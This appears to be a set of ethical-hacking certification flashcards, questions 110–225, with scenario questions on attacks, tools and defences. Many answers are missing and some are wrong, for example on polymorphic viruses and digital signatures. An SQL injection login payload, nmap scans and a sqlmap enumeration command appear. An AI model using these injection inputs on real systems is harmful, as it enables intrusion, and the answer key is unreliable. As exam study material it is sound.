Samuel monitored and intercepted already established traffic between Bob and a host machine to predict Bob’s ISN. Using this ISN, Samuel sent spoofed packets with Bob’s IP address to the host machine. The host machine responded with a packet having an incremented ISN. Consequently, Bob’s connection got hung, and Samuel was able to communicate with the host machine on behalf of Bob. What is the type of attack performed by Samuel in the scenario?*

A

TCP/IP hijacking

111
Q

By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext. Which file do you have to clean to clear the password?*

A

.bash_history

112
Q

Infecting a system with malware and using phishing to gain credentials to a system or web application are examples of which phase of the ethical hacking methodology?*

A

Gainig Access

113
Q

There have been concerns in your network that the wireless network component is not sufficiently secure. You perform a vulnerability scan of the wireless network and find that it is using an old encryption protocol that was designed to mimic wired encryption. What encryption protocol is being used?*

114
Q

Which protocol can be used to secure an LDAP service against anonymous queries?*

115
Q

Which type of virus can change its own code and then cipher itself multiple times as it replicates?*

A

stealth virus

116
Q

The network users are complaining because their systems are slowing down. Further, every time they attempt to go to a website, they receive a series of pop-ups with advertisements. What type of malware have the systems been infected with?*

117
Q

Steve created a fake profile on a social media website and sent a request to Stella. Stella was enthralled by Steve’s profile picture and the description given for his profile, and she initiated a conversation with him soon after accepting the request. After a few days, Steve started asking about her company details and eventually gathered all the essential information regarding her company. What is the social engineering technique Steve employed?*

A

Honey trap

118
Q

Johnson performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson’s machine. What is the social engineering technique employed?*

A

Quid pro quo

119
Q

Suppose that you test an application for the SQL injection vulnerability. You know that the backend database is based on Microsoft SQL Server. In the login/password form, you enter the credentials:

Username: attack’ or 1=1 -
Password: 123456

Based on the above credentials, which SQL commands are you expecting to be executed by the server, if there is indeed an SQL injection vulnerability?*

A

select * from Users where UserName = ‘attack’ or 1=1–’ and UserPassword =‘123456’

120
Q

Which command checks for valid users on an SMTP server?*

121
Q

From an Nmap output, what command-line parameter could you use to determine the type and version number of the web server?*

122
Q

John decided to use DNS to perform data exfiltration on a target network. In this process, he embedded malicious data into the DNS protocol packets that even DNSSEC cannot detect. Using this technique, John successfully injected malware to bypass a firewall and maintained communication with the victim machine and C&C server. What is the technique employed by John to bypass the firewall?*

A

DNS tunneling method

123
Q

A post-breach forensic investigation revealed that a known vulnerability in Apache Struts was to blame for the Equifax data breach that affected 143 million customers. A fix was available from the software vendor for several months prior to the intrusion. This is likely a failure in which of the following security processes?*

A

Patch management

124
Q

Steven connected his iPhone to a public computer that had been infected by Clark, an attacker. After establishing the connection with the public computer, Steven enabled iTunes Wi-Fi sync on the computer so that the device could continue communication with that computer even after being physically disconnected. Now, Clark gains access to Steven’s iPhone through the infected computer and is able to monitor and read all of Steven’s activity on the iPhone, even after the device is out of the communication zone. Which attack is performed by Clark in the scenario?*

A

iOS trustjacking

125
Q

Don came across a gaming app in a third-party app store and installed it. Subsequently, all the legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also received many advertisements on his smartphone after installing the app. What is the attack performed on Don?*

A

Agent Smith attack

126
Q

Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which Nmap commands must John use to perform the TCP SYN ping scan?*

A

nmap -sn -PS <target></target>

127
Q

Mason targets an organization and spreads Emotet malware through maliciousm script. After infecting the victims device, Mason further used Emotet to spread the infection across local networks and beyond to compromise as many machines as possible. ln this process, he used a tool, which is a self-extacting RAR file, to retrieve information related to network resources such as writable drives. What is the tool employed by
Mason?*

A

Credential enumerator

128
Q

Mason targets an organization and spreads Emotet malware through malicious script. After infecting the vitims device, Mason further used Emotet to spread the infection across local networks and beyond to compromise as many machines as possible. ln this process, he used a tool, which is a self-extacting RAR file, to retrieve information related to network resources such as writable drives. What is the tool employed by
Mason?*

A

Credential enumerator

129
Q

Which tactic uses malicious code to redirect users’ web traffic?*

130
Q

Calvin targets a web application that has design flaws in its authentication mechanism. He enumerates usernames from the login from of the web application, which requests users to feed data and specifies the incorrect field in case of invalid credentials. later, Calvin uses this information to perform social engineering. Which design flaw in the authentication mechanism is exploited by Calvin?*

A

Verbose failure messages

131
Q

Jacob wants to extract the source code of a mobile application and disassemble the application to analyze its design flaws. Using this technique, he wants to fix any bugs in the application, discover underlying vulnerabilities, and improve defense strategies against attacks. What is the technique used by Jacob to improve the security of the mobile application?*

A

Reverse Engineering

132
Q

A “Server-Side Includes” attack refers to the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary code remotely. Which webpage file type, if it exists on the web server, is a strong indication that the server is vulnerable to this kind of attack?*

133
Q

An organization decided to harden its security against web-application and web-server attacks. John, a security personnel in the organization, employed a security scanner to automate web-application security testing and to guard the organization’s web infrastructure against web-application threats. Using that tool, he also wants to detect XSS, directory transversal problems, fault injection, SQL injection, attempts to execute commands, and several other attacks. Which security scanner will help John perform the task?*

A

Syhunt Hybrid

134
Q

Juliet was tasked with checking for the authenticity of images to be used in the organization’s magazines. She used these images as a search query and tracked the original source and details of the images, which included photographs, profile pictures, and memes. Which footprinting technique did Rachel used to finish her task?*

A

Reverse image search

135
Q

An attacker utilizes a Wi-Fi Pineapple to run an access point with a legitimatelooking SSID for a nearby business in order to capture the wireless password. What kind of attack is this?*

A

Evil-twin attack

136
Q

Morris performed a vulnerability scan on a target organization by sniffing the traffic on the network to identify the active systems, network services, applications, and vulnerabilities. He also obtained the list of the users who are currently accessing the network. What is the type of vulnerability assessment that Morris performed on the target organization?*

A

Passive assessment

137
Q

Sophia spends significant time searching for trendy outfits online. Clark noticed her activities several times and sent a fake email containing a deceptive page link to her social media page displaying all-new and trendy outfits. In excitement, Sophia clicked on the malicious link and logged in to that page using her valid credentials. Which tool is employed by Clark to create the spoofed email?*

138
Q

Which Google advanced search operator helps an attacker in gathering nformation about websites that are similar to a specified target URL?*

A

[related:]

139
Q

While performing an Nmap scan against a host, Paola determines the existence of a firewall. In an attempt to determine whether the firewall is stateful or stateless, which option would be best to use?*

140
Q

____ is a type of phishing that targets high-profile executives such as CEOs, CFOs, politicians, and celebrities who have access to confidential and highly valuable information.*

141
Q

George is attempting to access restricted websites from an official computer. For this purpose, he used an anonymizer that masked his real IP address and ensured complete and continuous anonymity for all his online activities. Which anonymizer helps George hide his activities?*

A

http://www.guardster.com

142
Q

Lewis targeted the IoT cameras and devices used by a target venture-capital firm. He used an information-gathering tool to collect information about the IoT devices connected to a network, open ports and services, and the attack surface area. Using this tool, he also generated statistical reports on broad usage patterns and trends. This tool helped Lewis continually monitor every reachable server and device on the internet, further allowing him to exploit these devices in the network. Which tool was employed by Lewis?*

143
Q

Andrew was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task?*

A

ARP ping scan

144
Q

Tony is performing a penetration test. After gaining initial access to a target system, he finds a list of hashed passwords. Which tool would not be useful for cracking the hashed passwords?*

145
Q

BitLocker encryption has been implemented for all the Windows-based computers in an organization. You are concerned that someone might lose their cryptographic key. Therefore, a mechanism was implemented to recover the keys from Active Directory. What is this mechanism called in cryptography?*

A

Key escrow

146
Q

Larry has noticed some abnormalities in the user accounts on a web server. To thwart evolving attacks, he decided to harden the security of the web server by adopting a few countermeasures to secure the accounts on the web server. Which countermeasures must Larry implement to secure the user accounts on the web server?*

A

Limit the administrator or root-level access to the minimum number of users

147
Q

Harry targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection. What is the APT lifecycle phase that Harry is currently executing?*

A

Initial intrusion

148
Q

Leverox Solutions hired Arnold for the threat intelligence process. He collected information about specific threats against the organization. From this information, he retrieved contextual information about security events and incidents that helped him disclose potential risks and gain insight into attacker methodologies. He collected the information from sources such as humans, social media, and chat rooms as well as from events that resulted in cyberattacks. In this process, he also prepared a report that includes identified malicious activities, recommended courses of action, and warnings for emerging attacks. What is the type of threat intelligence collected by Arnold?*

A

Operational threat intelligence

149
Q

A security analyst uses Zenmap to perform an ICMP timestamp ping scan to acquire information related to the current time from the target host machine. Which Zenmap option must the analyst use to perform the ICMP timestamp ping scan?*

150
Q

Your organization has signed an agreement with a web hosting provider that requires you to take full responsibility of the maintenance of the cloud-based resources. Which model covers this?*

A

Infrastructure as a service(IaaS)

151
Q

Which type of SQL injection attacks extends the results returned by the original query, enabling attackers to run two or more statements if they have the same structure as the original one?*

A

Union SQL injection

152
Q

Hackers often raise the trust level of a phishing message by modeling the email to look similar to the internal email used by the target company. This includes using logos, formatting, and names of the target company. The phishing message will often use the name of the company CEO, President, or Managers. The time a hacker spends performing research to locate this information about a company is known as?*

A

Reconnaissance

153
Q

Alex is tasked with isolating applications from the underlying infrastructure and stimulating communication via well-defined channels. He used an open-source technology that helped him in developing, packaging, and running applications; further, the technology provides PaaS through OS-level virtualization, delivers containerized software packages, and promotes fast software delivery. What is the cloud technology employed by Alex?*

154
Q

A penetration tester is performing the footprinting process and is reviewing publicly available information about an organization by using the Google search engine. Which advanced operator would allow the pen tester to restrict the search to the organization’s web domain?*

155
Q

Roma was tasked with protecting the internal network of an organization from imminent threats. Roma fed threat intelligence into the security devices in a digital format to block and identify inbound and outbound malicious traffic entering the organization’s network. Which type of threat intelligence is used by Roma to secure the internal network?*

A

Technical threat intelligence

156
Q

Mary has found password hashes in a client system she managed to breach. She needs to use these passwords to continue with the test, but she does not have time to find the passwords that correspond to these hashes. Which type of attack can she implement in order to continue?*

A

Pass the hash

157
Q

Stella performs an attack on web services by exploiting a vulnerability that provides additional routing information in the SOAP header to support asynchronous communication. This further allows the transmission of web-service requests and response messages using different TCP connections. Which attack technique is used by Stella to compromise the web services?*

A

WS-Address spoofing

158
Q

Richard targets an MNC. He uses a footprinting technique to gather as much information as possible. He gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date. With this information, he creates a map of the organization’s network and misleads domain owners with social engineering to obtain internal details of its network. What type of footprinting technique is employed by Richard?*

A

Whois footprinting

159
Q

Which type of malware spreads from one system to another or from one network to another and causes similar types of damage as viruses do to the infected system?*

160
Q

You are attempting to run an Nmap port scan on a web server. Which command would result in a scan of common ports with the least amount of noise in order to evade IDS?*

A

nmap -sT -O -T0

161
Q

Jane invites her friends Alice and John over for a LAN party. Alice and John access Jane’s wireless network without a password. However, Jane has a long, complex password on her router. What attack has likely occurred?*

162
Q

John targeted an MNC. He decided to discover the IoT devices connected in the target network that are using default credentials and are vulnerable to various hijacking attacks. For this purpose, he used an automated tool to scan the target network for specific types of IoT devices and detect whether they are using the default, factory-set credentials. What is the tool employed by John?*

163
Q

Kate dropped her phone and subsequently encountered an issue with the phone’s internal speaker. Thus, she is using the phone’s loudspeaker for phone calls and other activities. Bob, an attacker, takes advantage of this vulnerability and secretly exploits the hardware of Kate’s phone so that he can monitor the loudspeaker’s output from data sources such as voice assistants, multimedia messages, and audio files by using a malicious app to breach speech privacy. What is the type of attack Bob performed on Kate?*

A

Spearphone attack

164
Q

Bob concluded one day that a DMZ is not needed if he properly configure the firewall to allow access just to servers/ports, which can have direct internet access, and block the access to workstations. Bob also concluded that DMZ makes sense just when a stateful firewall is available, which is not the case of his organization. In thisncontext, what can you say?*

A

Bob is totally wrong. DMZ is always relevant when the company has internet servers and workstations.

165
Q

James is working at Technix Solutions. The management ordered James to discover how vulnerable its network is towards footprinting attacks. James took the help of an open-source framework for performing automated reconnaissance activities. This framework helped James in gathering information using free tools and resources. What is the framework used by James to conduct footprinting and reconnaissance activities?*

A

OSINT framework

166
Q

Which wireless security protocol replaces the personal pre-shared key (PSK) authentication with Simultaneous Authentication of Equals (SAE) and is therefore resistant to offline dictionary attacks?*

A

WPA3 - Personal

167
Q

To hide the file on a Linux system, you have to start the filename with a specific character. What is the character?*

A

Period (.)

168
Q

Which is the first step followed by Vulnerability Scanners for scanning a network?*

A

Checking if the remote host is alive

169
Q

Jack targets an organization and performs vulnerability scanning on the target web server to identify any possible weaknesses, vulnerabilities, and misconfigurations. In this process, Jack uses an automated tool that eases his work and performs vulnerability scanning to find hosts, services, and other vulnerabilities in the target sever. Which tool is used by Jack to perform vulnerability scanning?*

A

Netsparker

170
Q

Upon establishing his new startup, Tom hired a cloud service provider (CSP) but was dissatisfied with their service and wanted to move to another CSP. What part of the contract might prevent him from doing so?*

171
Q

Kevin implemented a technique that enhances the security of keys used for encryption and authentication. Using this technique, Kevin input an initial key to an algorithm that generated an enhanced key that is resistant to brute-force attacks. What is the technique employed by Kevin to improve the security of encryption keys?*

A

Key stretching

172
Q

Stephen targeted the industrial control systems of an organization. He generated a fraudulent email with a malicious attachment and sent it to employees of the target organization. An employee who manages the sales software of the operational plant opened the fraudulent email and clicked on the malicious attachment. This resulted in the malicious attachment being downloaded and malware being injected into the sales software maintained in the victim’s system. Further, the malware propagated itself to other network systems, finally damaging the industrial automation components. What is the attack technique used by Stephen to damage the industrial systems?*

A

Spear-phishing attack

173
Q

What type of virus is most likely to remain undetected by antivirus software?*

A

Stealth virus

174
Q

Rebecca wants to authenticate employees who use web services for safe and secure communication. In this process, she employs a component of the Web Service Architecture, which is an extension of SOAP, and it can maintain the integrity and confidentiality of SAP messages. Which component of the Web Service Architecture is used by Rebecca for securing the communication?*

A

WS-Security

175
Q

Peter decided to work from his home and login remotely. Later, he anticipated that the remote connection could be exposed to session hijacking. To curb this possibility, he implemented a technique that creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information and prevent hackers from decrypting the data flow between the endpoints. What is the technique followed by Peter to send files securely through a remote connection?*

176
Q

Attacker Simon targeted the communication network of an organization and disabled the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic. He then extracted all the non-network logon tokens from all the active processes to masquerade as legitimate user to launch further attacks. What is the type of attack performed by Simon?*

A

Internal monologue attack

177
Q

Thomas is performing security assessment on cloud services to identify any loopholes. He detects a vulnerability in a bare-metal cloud server that can enable hackers to implant malicious backdoors in its firmware. He also identified that an installed backdoor can persist even if the server is reallocated to new clients or businesses that use it as an IaaS. What is the type of cloud attack that can be performed by exploiting the vulnerability discussed?*

A

Cloudborne attack

178
Q

John was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which Nmap command must John use to perform the TCP SYN ping scan?*

A

nmap -sn -PS <target></target>

179
Q

Tony wants to integrate a 128-bit symmetric block cypher with key sizes of 128, 192, or 256 bits into a software program, which involves 32 rounds of computational operations that include substitution and permutation operations on four 32-bit word
blocks using 8-variable S-boxes with 4-bit entry and 4-bit exit. Which algorithm includes all the above features and can be integrated by Tony into the software program?*

180
Q

When considering how an attacker may exploit a web server, what is web server footprinting?*

A

When an attacker gathers system-level data, including account details and server names

181
Q

Garry uses SNMP to manage networked devices from a remote location. To manage nodes in the network, he uses MIB, which contains formal descriptors of all network objects managed by SNMP. He accesses the contents of MIB by using a web browser either by entering the IP address and Lseries.mib or by entering the DNS library name and Lseries.mib. He is currently retrieving information from an MIB that contains object types for workstations and server services. Which type of MIB is accessed by Garry?*

A

LNMIB2.MIB

182
Q

Bill has been hired as a penetration tester an cyber security auditor for a major credit card company. Which information security standard is most applicable to his role?*

183
Q

Which is the best example of the third step (delivery) in the cyber kill chain?*

A

An intruder sends a malicious attachment via email to a target

184
Q

Sam was instructed to incorporate a hybrid encryption software program into a web application to secure email messages. Sam used an encryption software, which is a free implementation of the OpenPGP standard that uses both symmetric-key cryptography and asymmetric-ley cryptography for improved speed and secure key exchange. What is the encryption software employed by Sam for securing the email messages?*

185
Q

What useful information is gathered during a successful Simple Mail Transfer Protocol (SMTP) enumeration?*

A

The two internal commands VRFY and EXPN provide a confirmation of valid users, email addresses, aliases, and mailing lists

186
Q

Mike, a security engineer, was recently hired by BigFox Ltd. The company recently experienced disastrous DoS attacks. The management had instructed Mike to build defensive strategies for the company’s IT infrastructure to thwart DoS/DDoS attacks. Mike deployed some countermeasures to handle jamming and scrambling attacks. What is the countermeasure Mike applied to defend against jamming and scrambling attacks?*

A

Implement cognitive radios in the physical layer

187
Q

Jude examined a network from a hacker’s perspective to identify exploits and vulnerabilities accessible to the outside world by using devices such as firewalls, routers, and servers. In this process he also estimated the threat of network security attacks and determined the level of security of the corporate network. What is the type of vulnerability assessment that Jude performed on the organization?*

A

External assessment

188
Q

Jude performs sophisticated security testing on his company’s network infrastructure to identify security loopholes. In this process, he started to circumvent the network protection tools and firewalls used in the company. He employed a
technique that can create forged TCP sessions by carrying out multiple SYN, ACK, and RST or FIN packets. Further, this process allowed Jude to execute DDoS attacks that can exhaust the network resources. What is the attack technique used by Jude for finding loopholes?*

A

Spoofed session flood attack

189
Q

You have been authorized to perform a penetration test against a website. You want to use Google dorks to footprint the site but only want results that show file extensions. What Google dork operator would you use?*

190
Q

An attacker decided to crack the passwords used by industrial control systems. In this process, he employed a loop strategy to recover these passwords. He used one character at a time to check whether the first character entered is correct; if so, he continued the loop for consecutive characters. If not, he terminated the loop. Furthermore, the attacker checked how much time the device took to finish one complete password authentication process, through which he deduced how many characters entered are correct. What is the attack technique employed by the attacker to crack the passwords of the industrial control systems?*

A

Side-channel attack

191
Q

According to the NIST cloud deployment reference architecture, which provides connectivity and transport services to consumers?*

A

Cloud carrier

192
Q

After an audit, the auditors inform you that there is a critical finding that you must tackle immediately. You read the audit report, and the problem is the service running on port 389. Which service is this and how can you tackle the problem?*

A

The service is LDAP, and you must change it to 636, which is LDAPS

193
Q

This type of injection attack does not show any error message. It is difficult to exploit as it returns information when the application is given SQL payloads that elicit a true or false response from the server. By observing the response, an attacker can extract sensitive information. What type of attack is this”?*

A

Blind SQL injection

194
Q

Hailey gathers a list of employee and client email addresses and other related information by using various search engines, social networking sites, and web spidering tools. In this process, she also uses an automated tool to gather a list of words from the target website to further perform a brute-force attack on the previously gathered email addresses. What is the tool used by Hailey for gathering a list of words form the target website?*

195
Q

Becky has been hired by a client from Dubai to perform a penetration test against a remote office. Working from her location in Columbus, Ohio, Becky runs her usual reconnaissance scans to obtain basic information about their network. When analyzing the results of her Whois search, Becky notices that the IP was allocated to a location in Le Havre, France. Which regional Internet registry should Becky go to form detailed informatio*

196
Q

Robert is attempting to execute a fault injection attack on a target IoT device. In this process, he injects faults into the power supply that can be used for remote execution, also causing the skipping of key instructions. He also injects faults into the clock network used for delivering a synchronized signal across the chip. Which type of fault injection attack is performed by Robert?*

A

Power/clock/reset glitching

197
Q

Which type of attack attempts to overflow the content-addressable memory (CAM) table in an Ethernet switch?*

A

MAC flooding

198
Q

Eric implements a technique for securing the cloud resources used by his organization. This technique assumes by default that a user attempting to access the network is not an authentic entity and verifies every incoming connection before allowing access to the network. Using this technique, he also imposed conditions such that employees can access only the resources required for their role. What is the technique employed by Eric to secure cloud resources?*

A

Zero trust network

199
Q

Louis had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive/hidden information about official government or federal databases. After gathering the information, he successfully performed an attack on the target government organization without being traced. Which technique is described?*

A

Dark web footprinting

200
Q

Given are different steps involved in the vulnerability-management life cycle.

  1. Remediation
  2. Identify assets and create a baseline
  3. Verification
  4. Monitor
  5. Vulnerability scan
  6. Risk assessment

Identify the correct sequence of steps involved in vulnerability management.

A

2→5→6→1→3→4
→Identify Assets and create Baseline
→ Vulnerability Scan
→ Risk Assessment
→ Remediation
→ Verification
→ Monitor

201
Q

Jake installed spyware on a target iPhone to spy in the target user’s activities. He can take complete control of the target mobile device by jailbreaking the device remotely and record audio, capture screenshots, and monitor all phone calls and SMS messages. What is the type of spyware that Jake used to infect the target device?*

202
Q

What information security law or standard aims at protecting stakeholders and the general public from accounting errors and fraudulent activities within organizations?*

203
Q

Which is the best example of the hacking concept called “clearing tracks”?*

A

During a cyberattack, a hacker corrupts the event logs on all machines

204
Q

Morris wanted to check whether the target AP is in a locked state. He attempted using different utilities to identify WPS-enabled APs in the target wireless network. Ultimately, he succeeded with one special command-line utility. Which command-line utilities allowed Morris to discover the WPS-enabled APs?*

205
Q

What would be the purpose of running “wget 192.168.0.15 -q -S” against a web server?*

A

Using wget to perform banner grabbing on the webserver

206
Q

James was tasked with performing enumeration an organizations’ network. In the process of enumeration, James discovered a service that is accessible to external sources. This service runs directly on port 21. What is the service enumerated by James?*

A

File Transfer Protocol (FTP)

207
Q

What is the following command used for?

sqlmap.py -u “http://10.10.1.20/?p=1&forumaction=search” -dbs*

A

Enumerating the databases in the DBMS for the URL

208
Q

You need to deploy a new web-based software package for your organization. The package requires three separate servers and needs to be available on the Internet. What is the recommended architecture in terms of server placement?*

A

A web server facing the Internet, an application server on the internal network, a database server on the internal network

209
Q

Joel targeted a company and identified the types of websites frequently visited by its employees. Using this information he searched for possible loopholes in these websites and injected a malicious script that can redirect users form the web page and
download malware onto a victim’s machine. Joel waits for the victim to access the infected web application so as to compromise the victim’s machine. Which technique is used by Joel?*

A

Watering hole attack

210
Q

John found a critical vulnerability on the organization’s LAN that allows him to view financial and personal information about the rest of the employees. Before reporting the vulnerability, he examines the information shown by the vulnerability for two days without disclosing any information to third parties or other internal employees. He does so out of curiosity about the other employees and may take advantage of this information later. What would John be considered as?*

211
Q

An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security. When the investigator attempt to correlate the information in all of the logs, the sequence of many of the logged events do not match up. What is the most likely cause?*

A

The network devices are not all synchronized

212
Q

Harris is attempting to identify the OS running on his target machine. He inspected the initial TTL in the IP header and the related TCP window size and obtained the following results:

TTL: 64
Window Size: 5840

What is the OS running on the target machine?*

213
Q

Mirai malware targets IoT devices. After infiltration, it uses them to propagate and create botnets that are then used to launch which types of attack?*

A

DDoS attack

214
Q

A post-breach forensic investigation revealed that a known vulnerability in Apache Struts was to blame for the Equifax data breach that affected 143 million customers. A fix was available from the software vendor for several months prior to the intrusion. This is likely a failure in which security process?*

A

Patch management

215
Q

Which Metasploit post-exploitation module can be used to escalate privileges on Windows systems?*

216
Q

Josh has finished scanning a network and has discovered multiple vulnerable services. He knows that several of these usually have protections against external sources but are frequently susceptible to internal users. He decided to draft an email, spoof the sender as the internal IT team, and attach a malicious file disguised as a financial spreadsheet. Before Josh sends the email, he decides to investigate other methods of getting the file onto the system. For this particular attempt, what was the last stage of the cyber kill chain that Josh performed?*

A

Weaponization

217
Q

Your company was hired by a small healthcare provider to perform a technical assessment on the network. What is the best approach for discovering vulnerabilities on a Windows-based computer?*

A

Use a scan tool like Nessus

218
Q

Geena uses a master component in the Kubernetes cluster architecture that scans newly generated pods and allocates a node to them. This component can also assign nodes based on factors such as the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions. Which master component is explained?*

A

Kube-scheduler

219
Q

Ricardo has discovered the username for an application in his target’s environment. As he has a limited amount of time, he decides to attempt to use a list of common passwords he found on the Internet. He compiles them into a list and then feeds that list as an argument into his password-cracking application. What type of attack is Ricardo performing?*

A

Dictionary

220
Q

Bob wants to ensure that Alice can check whether his message has been tampered with. He creates a checksum of the message and encrypts it using asymmetric cryptography. What key does Bob use to encrypt the checksum for accomplishing this goal?*

A

Alice’s public key

221
Q

Dayn wanted to detect if any honeypots are installed in a target network. For this purpose, he used a time-based TCP fingerprinting method to validate the response to a normal computer and the response of a honeypot to a manual SYN request. Which technique is employed by Dayn to detect honeypots?*

A

Detecting the presence of Honeyd honeypots

222
Q

A group of hackers were roaming around a bank office building in a city, driving a luxury car. They were using hacking tools on their laptop with the intention to find a free-access wireless network. What is this hacking process known as?*

A

Wardriving

223
Q

Henry is a penetration tester. While performing enumeration on a client organization, he queries the DNS server for a specific cached DNS record. Further, by using this cached record, he determines the sites recently visited by the organization’s user. What is the enumeration technique used by Henry on the organization?*

A

DNS cache snooping

224
Q

Miley decided to attack a target organization’s network. To perform the attack, she used a tool to send fake ARP messages over the target network to link her MAC address with the target system’s IP address. By performing this, Miley received messages directed to the victim’s MAC address and further used the tool to intercept, steal, modify, and block sensitive communication to the target system. What is the tool employed by Miley to perform the attack?*

225
Q

Gregory is tasked with performing a security test of web applications used in the company. For this he uses a tool to test for any security loopholes by hijacking a session between a client and server. This tool has a feature of intercepting proxy that can be used to inspect and modify the traffic between the browser and target application. This tool can also perform customized attacks and can be used to test the randomness of session tokens. Which tool is used by Gregory?*

A

Burp Suite